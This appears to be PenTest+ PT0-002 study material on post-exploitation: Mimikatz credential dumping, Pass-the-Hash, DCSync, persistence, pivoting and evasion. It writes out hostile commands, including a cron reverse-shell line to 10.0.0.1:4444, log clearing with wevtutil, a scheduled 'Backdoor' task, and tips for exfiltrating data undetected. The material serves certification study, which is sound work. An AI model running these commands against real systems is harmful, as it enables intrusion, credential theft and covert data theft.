Common mistakes in real-world engagements include leaving Mimikatz binaries on disk (which AV detects), using well-known default ports for C2 (e.g., 4444), and failing to clean event logs (e.g., wevtutil cl System) where the rules of engagement require it. Penetration testers must balance speed with stealth; many organizations have EDR solutions that alert on handle access to lsass.exe. Testers often use process injection (e.g., into explorer.exe) to evade detection. The PT0-002 exam expects you to know these practical considerations.

How PT0-002 Actually Tests This

The PT0-002 exam (Objective 3.4) specifically tests post-exploitation techniques under the 'Attacks and Exploits' domain. You will be asked to identify the correct tool or command for a given scenario. Common wrong answers include:
1. Choosing Pass-the-Hash when the target cannot be reached. PtH is ordinary NTLM network authentication with a hash; if the target is firewalled or sits on a subnet the attacker cannot route to, you need pivoting first.
2. Selecting 'service misconfiguration' when the question describes a kernel exploit.  Both are vertical escalation, but a kernel exploit abuses a missing patch while a service misconfiguration abuses permissions or paths; pick the vector the scenario actually describes.
3. Confusing lateral movement with privilege escalation. Lateral movement is between hosts; privilege escalation is on the same host.
4. Thinking DCSync works with any domain account. DCSync requires directory replication rights, which by default only Domain Admins, Enterprise Admins, and Domain Controllers hold.

Exact values to memorize:

Default Kerberos TGT lifetime: 10 hours.

Mimikatz command sekurlsa::logonpasswords.

Windows service recovery action default: take no action on failure (automatic restart must be configured explicitly, with sc failure or the service's Recovery tab).

wevtutil cl clears logs; wevtutil epl exports.

schtasks /create /sc onlogon /tn Backdoor /tr C:\backdoor.exe.

Edge cases:

If LSASS is running as PPL (Protected Process Light), Mimikatz fails unless the mimidrv driver is loaded.

Pass-the-Hash does not work when NTLM is disabled (e.g., via the Restrict NTLM Group Policy settings) or the target is Kerberos-only; for local accounts other than the built-in RID 500 Administrator it also fails against default Windows hosts, because UAC remote restrictions (LocalAccountTokenFilterPolicy = 0) strip the admin token from network logons.

On Linux, sudo -l shows allowed commands; if sudo is not installed, you cannot escalate via sudo.

To eliminate wrong answers, focus on the mechanism: if the question mentions 'hash' and 'remote authentication', it's likely PtH. If it mentions 'ticket' and 'Kerberos', it's PtT. If it mentions 'pivot' and 'proxy', think of SSH tunneling or Metasploit route.

Key Takeaways

Post-exploitation includes persistence, privilege escalation, lateral movement, credential dumping, pivoting, and exfiltration.

Mimikatz command `sekurlsa::logonpasswords` dumps credentials from LSASS; requires `privilege::debug` first.

Pass-the-Hash uses NTLM hashes; works only if NTLM is enabled and target is reachable.

DCSync requires directory replication rights (held by Domain Admins by default) and extracts any account's hash from a DC over the network.

Common persistence locations: Windows Run keys, Startup folder, scheduled tasks; Linux cron, SSH keys.

BloodHound maps AD attack paths; uses Neo4j database to store graph data.

Pivoting via SSH dynamic port forwarding (`-D`) creates a SOCKS proxy; proxychains routes tools through it.

Always clean logs selectively or clear them only if necessary; clearing the Security log creates event ID 1102 and clearing any other log creates event ID 104 in the System log, and defenders alert on both.

Vertical escalation gains higher privileges on same host; horizontal escalation accesses another user's account.

JuicyPotato exploits `SeImpersonatePrivilege` to escalate to SYSTEM on Windows.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

Pass-the-Hash (PtH)

Uses NTLM hash for authentication

Works over SMB, WMI, WinRM (if NTLM enabled); RDP only when Restricted Admin mode is enabled on the target

Requires local admin hash or domain user hash

No need for plaintext password

Tool: Mimikatz `sekurlsa::logonpasswords` to obtain the hash, then `sekurlsa::pth` to start a process that authenticates with it

Pass-the-Ticket (PtT)

Uses Kerberos TGT or service ticket

Works over Kerberos-authenticated protocols (e.g., HTTP, SMB)

Requires domain user ticket from memory

No need for password or hash

Tool: Mimikatz `kerberos::ptt` with extracted ticket

Watch Out for These

Mistake

Mimikatz can always extract plaintext passwords from LSASS.

Correct

Mimikatz can only extract plaintext if an authentication provider keeps the password in a reversible form (e.g., WDigest). Windows 8.1/Server 2012 R2 and later disable WDigest credential caching by default, and KB2871997 brought the same UseLogonCredential control to Windows 7/8 and Server 2008 R2/2012, so on patched systems Mimikatz often gets only NTLM hashes, not plaintext.

Mistake

Pass-the-Hash works against any Windows system.

Correct

Pass-the-Hash only works if NTLM authentication is enabled and the target is reachable on an NTLM-capable service (SMB, WMI, WinRM, or RDP in Restricted Admin mode). It fails when NTLM is disabled via Group Policy, when the target is Kerberos-only, and, for local admin accounts other than the built-in Administrator, when UAC remote restrictions are left at their default.

Mistake

Clearing event logs removes all evidence of an attack.

Correct

Clearing logs leaves its own trace: `wevtutil cl Security` writes event ID 1102 (audit log cleared) into the freshly emptied Security log, and `wevtutil cl System` writes event ID 104 (log file cleared). Advanced attackers delete only specific events or use timestomping to alter the timestamps of the files they dropped.

Mistake

Persistence is only needed for long-term access.

Correct

Persistence is critical even for short-term tests because the initial shell may be unstable (e.g., due to network interruptions). A scheduled task that reconnects every 5 minutes ensures continuous access.

Mistake

DCSync can be performed by any domain user.

Correct

DCSync requires the 'Replicating Directory Changes' and 'Replicating Directory Changes All' permissions on the domain object, which by default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers hold (plus accounts they are deliberately delegated to, such as an Azure AD Connect sync account). A standard user cannot perform DCSync.


Frequently Asked Questions

What is the difference between pass-the-hash and pass-the-ticket?

Pass-the-hash (PtH) uses an NTLM hash to authenticate to remote systems, typically over SMB or WMI. It does not require the plaintext password. Pass-the-ticket (PtT) uses a Kerberos ticket-granting ticket (TGT) or service ticket to authenticate. PtH works when NTLM is enabled; PtT works in Kerberos environments. Both can be performed with Mimikatz: PtH uses `sekurlsa::pth`, PtT uses `kerberos::ptt`.

How do I escalate from a local admin to SYSTEM on Windows?

Common methods include: using Mimikatz's `token::elevate` to impersonate SYSTEM token, exploiting service misconfigurations (e.g., unquoted service path), using JuicyPotato if `SeImpersonatePrivilege` is enabled, or exploiting a kernel vulnerability. The easiest is often `psexec -s` or `sc create` with `LocalSystem` account.

What is DCSync and how does it work?

DCSync is a Mimikatz feature that mimics a Domain Controller to request password hashes from a real DC via the DRSUAPI protocol. It requires the 'Replicating Directory Changes' permission (usually Domain Admin). The command is `lsadump::dcsync /domain:example.com /user:krbtgt`.

How can I maintain access after a reboot on Linux?

Add an SSH public key to `~/.ssh/authorized_keys`, create a cron job (`crontab -e`) that runs a reverse shell, or create a systemd service. Example cron: `*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'`.

What is the best way to move laterally in a Windows domain?

Use pass-the-hash with CrackMapExec or Impacket's psexec.py if you have local admin hashes. For domain users, use WMI (wmiexec.py) or WinRM. BloodHound can identify the shortest path to a target. Always check network connectivity first with `ping` or `Test-NetConnection`.

How do I exfiltrate data without being detected?

Encrypt the data (e.g., `gpg -c file`), then split it into small chunks. Use HTTPS uploads to a cloud service (e.g., Google Drive API) or DNS tunneling (dnscat2). Avoid large outbound transfers; instead, use steganography or hide data in legitimate traffic.

What tools can I use to dump credentials on a Linux system?

For Linux, use `mimipenguin` to dump passwords from memory, `LaZagne` for application passwords, and `grep` for plaintext passwords in config files. Also check `/etc/shadow` if you have root access. For SSH keys, look in `.ssh/` directories.

